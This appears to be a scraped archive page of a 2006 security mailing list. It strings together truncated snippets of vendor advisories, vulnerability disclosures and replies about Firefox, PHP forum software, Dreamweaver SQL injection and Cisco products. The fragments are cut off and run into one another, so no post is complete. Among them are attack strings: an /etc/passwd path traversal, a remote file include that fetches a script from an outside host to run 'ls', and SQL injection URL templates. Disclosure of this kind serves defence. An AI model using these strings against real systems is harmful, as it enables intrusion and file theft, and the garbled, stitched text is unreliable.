- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
Multiple SQL Injection Vulnerabilities in Dreamweaver Generated Code
INFORMATION:
-
Class: SQL Injection
CVE: CVE-2006-2042
Remote: Yes
Local: Yes
Published: May 09, 2006
Credit: Brian Gallagher [EMAIL PROTECTED]
Vulnerable:
Dreamweaver Ultradev
Dreamweaver MX
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:083
http://www.mandriva.com/security/
Script: DMCounter
Version: 0.9.2-b
Language: PHP
Problem: Remote File Include
Vendor: http://Www.HackMaster.Us
Discovered by: C-W-M(at)hackmaster(dot)us
Description
=
Statistics software based on PHP which does not require any database
support but just uses flat files. Daily +
On 5 May 2006 09:51:42 -, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
try this with Firefox 1.5.0.3
»www.gavinsharp.com/tmp/ImageVuln.html
Windows Only - Yes?
Head
TitleBug 334341/Title
/Head
Body
Img src=C:\WINDOWS\Media\ringin.wav right click the image and
select View Image
/Body
foud by: BoNy-m
Also apparently found by durito in September 2004, as identified in
the Turbo Seek product.
/tseekdir.cgi?id=1055location=/etc/passwd%00
This is the same exploit vector as what was reported in Secunia
SA12500 and BID 11163:
http://www.securityfocus.com/bid/11163/exploit
A few people have asked me recently what it is I'm actually looking for from
Oracle. I have a nice little laundry list of things, of course, but mostly
all I've been waiting for is to hear Oracle to say, We admit we have a
problem with regards to security, but here's our strategy and we're
This URL listed has been updated to include more recent (background)
information from Mr. Gavin Sharp on 7th May.
The original testcase URL is located at
http://www.gavinsharp.com/tmp/ImageVuln2.html
now.
- Juha-Matti
try this with Firefox 1.5.0.3
»www.gavinsharp.com/tmp/ImageVuln.html
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[EMAIL PROTECTED] wrote:
try this with Firefox 1.5.0.3
»www.gavinsharp.com/tmp/ImageVuln.html
This is not a code execution exploit and neither a security problem.
This is simply an application bug.
- --
Flavio Visentin
GPG Key:
Hello,
I never read anything else from you.
I checked the points you told me (bug in milliscripts redirection when
checking $domainname for example), but they are not true.
In /include/functions.php, *every* input is checked for validation.
The functions are called:
check_domain($dname)
On Monday 08 May 2006 04:49, you wrote:
You state these problems exist at php.net and elsewhere, so why is the
subject titled phpbb? php.net even recommends that for production sites
displaying of errors is discouraged. I'm unsure how your report brings
anything new as you specify the valid
[EMAIL PROTECTED] wrote:
While this is arguably a misfeature, it's not like anyone reading the
documentation wouldn't know about it, and you have to explicitly enable
it. It does not seem too much of a problem to me.
Joachim
Hi.
Of course it is, but it's hidden away nicely, and who
On Tue, 9 May 2006 [EMAIL PROTECTED] wrote:
We know that tcp connection will close by sending RST flag.
I try to connect to my openssh server on
slackware 10 from my computer fedora core 4. Then using an
openbsd 3.7, that had same network with slackware n fedora,
try to overwrite ARP cache
--
foud by: Brh
Site: http://www.alshmokh.com
Email: [EMAIL PROTECTED]
--
$query = $db-query(SELECT pid FROM .TABLE_PREFIX.posts WHERE tid='$tid'
$visible ORDER BY dateline LIMIT $start, $perpage);
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[EMAIL PROTECTED] wrote:
test2:
http://werterxyz.altervista.org/test2.html
http://geocities.com/werterxyz/test2.html
Did not crash FF 1.5.0.3 on Windows Server 2003 SP1 (slowed it down for
a few seconds and launched Outlook Express, but that's
Credits:
Discovered by: SnoB - [EMAIL PROTECTED]
http://www.cyber-security.org
Vendor URL : SmartISoft http://smartisoft.com
Dork/Search for: PHPListPro ©2001-2006 SmartISoft
Exploit :
/config.php?returnpath=http://www.example.com/yourscript.txt?ls%20-laF
Cuma 5 May 2006 12:51 tarihinde, [EMAIL PROTECTED] şunları yazmıştı:
try this with Firefox 1.5.0.3
�www.gavinsharp.com/tmp/ImageVuln.html
Gives Unknown protocol (c) here with Firefox 1.5.0.3
--
pgp768yB9mnXA.pgp
Description: PGP signature
What application are you talking about?
On 5 May 2006 [EMAIL PROTECTED] wrote:
By: Mr-X
Email: [EMAIL PROTECTED]
Subject: modules name(Downloads)SQL Injection
example:-
/modules.php?/modules.php?name=Downloadsd_op=viewdownloadcid=[SQL]
#--
#Discovered by: Aura
#ARIA - SECURITY TEAM
#Gr33t to: O.U.T.L.A.W [EMAIL PROTECTED] Smok3r
#---
» Vendor: Vbulletin
» Summary:
vbulletin is a powerfull Forum System
Hi,
Microsoft Windows NTDLL.DLL is prone to an incorrect path conversion
vulnerability. This flaw could be successful exploited by malicious users
in order to bypass protection mechanisms implemented by certain antivirus
and antispyware products.
Advisory can also be located at -
Critical:
Moderately critical
Impact: DoS
Where: From remote
Solution Status: Vendor Patch
Software: Kerio WinRoute Firewall 6.x
Select a product and view a complete list of all Patched/Unpatched Secunia
advisories affecting it.
Description:
A vulnerability has been reported in Kerio
ZDI-06-014: Verisign I-Nav ActiveX Control Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-014.html
May 10, 2006
-- CVE ID:
CVE-2006-2273
-- Affected Vendor:
Verisign
-- Affected Products:
i-Nav ActiveX Control
-- TippingPoint(TM) IPS Customer Protection:
You state these problems exist at php.net and elsewhere, so why is the
subject titled phpbb? php.net even recommends that for production sites
displaying of errors is discouraged. I'm unsure how your report brings
anything new as you specify the valid use of debug and displaying of
errors
Does this include the ACS appliance engine.
Greg Owens, CCNP CCSP CISSP
Email:[EMAIL PROTECTED]
--
Sent from my Samsung I730 Wireless Handheld
-Original Message-
From: Matthew Cerha[EMAIL PROTECTED]
Sent: 5/8/06 6:15:58 PM
To:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Cisco Security Advisory: AVS TCP Relay Vulnerability
Advisory ID: cisco-sa-20060510-avs
http://www.cisco.com/warp/public/707/cisco-sa-20060510-avs.shtml
Revision 1.0
For Public Release 2006 May 10 1600 UTC (GMT
27 matches
Mail list logo